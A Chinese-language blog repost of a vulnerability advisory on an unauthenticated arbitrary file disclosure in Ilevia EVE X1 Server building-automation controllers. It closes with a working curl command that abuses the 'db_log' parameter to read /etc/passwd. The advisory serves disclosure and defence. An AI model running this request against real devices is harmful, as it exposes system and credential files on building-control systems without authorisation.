Ilevia EVE X1 Server 4.7.18.0.eden 未授权文件泄露漏洞利用分析

本文详细分析了Ilevia EVE X1 Server 4.7.18.0.eden版本中存在的未授权文件泄露漏洞,攻击者可通过db_log参数读取任意文件,获取敏感系统信息,影响多个Linux平台。

Ilevia EVE X1 Server 4.7.18.0.eden (db_log) 未授权文件泄露漏洞

厂商: Ilevia Srl.
产品页面: https://www.ilevia.com
受影响版本: <=4.7.18.0.eden (逻辑版本: 6.00)

概述

EVE是一款智能家居和楼宇自动化解决方案,适用于住宅和商业环境,包括商场、酒店、餐厅、酒吧、健身房、水疗中心、会议室和办公室。它通过高度可定制的用户友好界面,实现对电气安装的全面控制和监控。

EVE是一个多协议平台,集成了智能建筑内的各种系统,以提升舒适度、安全性、保障和能效。用户可以通过iPhone、iPad、Android设备、Windows PC或Mac电脑管理建筑功能。

EVE X1 Server是专为高级楼宇自动化需求设计的硬件解决方案。紧凑而强大,非常适合公寓、中小型住宅和小型商业安装。它旨在可靠高效地管理整个自动化系统。

漏洞描述

控制器存在未授权文件泄露漏洞。攻击者利用’db_log’ POST参数,可以泄露受影响设备上的任意文件,获取敏感和系统信息。

测试环境

  • GNU/Linux 5.4.35 (armv7l)
  • GNU/Linux 4.19.97 (armv7l)
  • Armbian 20.02.1 Buster
  • Apache/2.4.38 (Debian)
  • PHP Version 7.3.14

发现者

Gjoko ‘LiquidWorm’ Krstic
@zeroscience

咨询信息

咨询ID: ZSL-2025-5955
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5955.php
日期: 2024年5月1日

漏洞利用示例

1
$ curl -X POST "http://ilevia:8080/ajax/php/dbcheck.php" -d "db_log=/etc/passwd"
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计